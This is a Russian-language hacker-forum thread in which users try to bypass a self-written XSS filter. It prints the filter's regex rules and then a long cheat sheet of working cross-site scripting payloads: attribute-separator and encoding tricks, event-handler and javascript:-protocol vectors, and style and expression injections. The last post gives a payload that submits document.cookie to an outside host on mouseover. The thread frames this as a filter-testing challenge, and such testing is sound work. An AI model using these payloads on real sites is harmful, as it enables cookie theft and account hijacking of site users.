Форум АНТИЧАТ - Задачка для xss мастеров

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Задачка для xss мастеров - обойти фильтр (https://forum.antichat.xyz/showthread.php?t=54518)

Задачка для xss мастеров - обойти фильтр

Написал фильтр ксс , проверяет заголовки браузера юзер агент , реферер , а также заголовки которые должны передавать прокси на корректность.Ну и конечно весь массив данных GET POST COOKIE по сформированным правилам,также там присутствует алгоритм декодирования stringFromCharCode,хекс и урл кодирования.Ваша задача - заставить фильтр не заметить вашу xss и вывести ее,те обычная xss не годится если фильтр скажет Possilbe xss found.Гоу

В идеале - нахождение недокумментированных разделителей для функций , таких как 0 для фаерфокса и 8 для эксплорера и прочих специальных символов.

http://underwater.itdefence.ru/blog/antixss/ex.php

слишком жесткая фильтрация

Цитата:

Possible Xss Found

Input string : <script>alert('xxs')</script>
Description : Нарушение струкруты значения параметра
Filter rule : <(\s?)[\\\///]

Input string : <script>alert('xxs')</script>
Description : Внедрение опасных html тегов
Filter rule : [<\s]((\/?)script(\/?))|((\/?)[i|I]frame(\/?))|(@import)((\/?)object(\/?))[\s>]

Input string : <script>alert('xxs')</script>
Description : Создание javascript окон
Filter rule : (alert|msgbox|expression|dialog|confirm|promt)\s*[={}\/():;&\+\-\^\[\|]

действительно, задача не из легких

Берем, пишем....

Код:

' onClick="javascript: document.write('<script>alert(1)</script>')"

Пишет поссибл хсс и все такое... но если клацнуть - увидим ожидаемый эффект... вставить можн соответственно не ток такую конструкцию, а то вздумаетси +)

Бага найдена

Цитата:

><script>alert('Hi')</script><script>alert('hi')</script><

мдя.... на моем примере можно понять - необходимо не просто найти багу, а что бы фильтр не матюкнулся.

Код:

# Разделители атрибутов тега.

Помимо пробела, можно использовать символы: слеш(/), табуляцию, перевод строки. Разделитель можно опустить, если предыдущий атрибут заключен в кавычки.



<image/src="1.png"/alt="Подсказка"/border="0">

<image        src="1.png"        alt="Подсказка"        border="0">

<image

src="1.png"

alt="Подсказка"

border="0">

<image src="1.png"alt="Подсказка"border="0">



# Ограничители атрибутов тега

Значения можно заключать в кавычки (двойные и одинарные) и в апострофы, а можно вообще не ограничивать.



<image src="" alt="Моя подсказка" border="0">

<image src="" alt='Моя подсказка' border="0">

<image src="" alt=`Моя подсказка` border="0">

<image src="" alt=Подсказка border="0">



# Кодировки символов

Расшифровка символов в скрипте происходит до его выполнения:



<img src=javascript:alert(&quot;ok&quot;)>

<img src=javascript:alert('ok')>

<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#111&#107&#39&#41>

<a href=javascript:alert(%22ok%22)>click me</a> (только в атрибуте href)



# Ограничители символьных литералов в скриптах



<img src=javascript:alert('ok')>

<img src=javascript:alert("ok")>

<img src=javascript:a=/ok/;alert(a.source)>

<img src=javascript:alert(String.fromCharCode(111,107))>



# Обход фильтрации некоторых символов



<img src=javascript:i=new/**/Image();i.src='http://bla.bla'>(замена пробела на /**/)



# Способы запуска скриптов

Несколько способов автоматического запуска скриптов:



<script>alert('ok')</script>

<script src=1.js></script>

<body onLoad=alert('ok')>

<meta http-equiv=Refresh content=0;url=javascript:alert('ok')>

<image src=1.png onload=alert('ok')>

<image src=javascript:alert('ok')>

<image src="" onerror=alert('ok')>

<hr style=background:url(javascript:alert('ok'))>

<span style=top:expression(alert('ok'))></span>

<span sss="alert();this.sss=null" style=top:expression(eval(this.sss));></span> (срабатывает только один раз)

<style type="text/css">@import url(javascript:alert('ok'));</style>

<object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('ok')></object>

<embed src=javascript:alert('ok');this.avi>

<embed src=javascript:alert('ok');this.wav>

<iframe src=javascript:alert('ok')> (только в IE)

<a href=javascript:alert(%22ok%22)>click me</a> (запуск только при клике по ссылке)

<a href=javascript:alert('aaa'+eval('alert();i=2+2')+'bbb')>click me</a>  (запуск только при клике по ссылке)

<br SIZE="&{alert('XSS')}"> (только Netscape 4.x)



# Различные скриптовые протоколы, способы их написания



<img src=javascript:alert()>

<img src=vbscript:AleRt()>

<img src=JaVasCriPt:alert()>

<img src="   javascript:alert()"> (пробелы до слова javascript) 

<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert()>

<img src=javascript&#9:alert()>

<img src=javascript&#10:alert()>

<img src=javascript&#13:alert()>

<img src="javascript        :alert()">  (перед двоеточием - символ табуляции) 

<img src="java        scri

pt:ale        rt()"> (внутри слова javascript - символ табуляции и возврат каретки) 



# Вставки скриптов в style

Операторы скрипта в атрибуте style нужно разделять "\;".



<hr style=`background:url(javascript:alert('ok 1')\;alert('ok 2'))`>

много чего срабатывает.

Интересный ресурс
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php
ну и саму IDS скачать
http://php-ids.org/downloads/

<a'a><img src=http://img.yandex.net/i/yandex-v9.gif>
png+hex=IE, вспоминаем как IE обрабатывает графические файлы.

мда.... если на то пошло, то и так:

Код:

'style='background-image:url(http://vdshark.heliosart.info/head.gif);

PHP код:


		
			
'onmouseover  =  "this.action  =  'http://antichat.ru/';this.elements[0].value  = self['doc'  +  'ument']['coo'  +   'kie'];this.submit()"k='

Бить врага его же оружием :)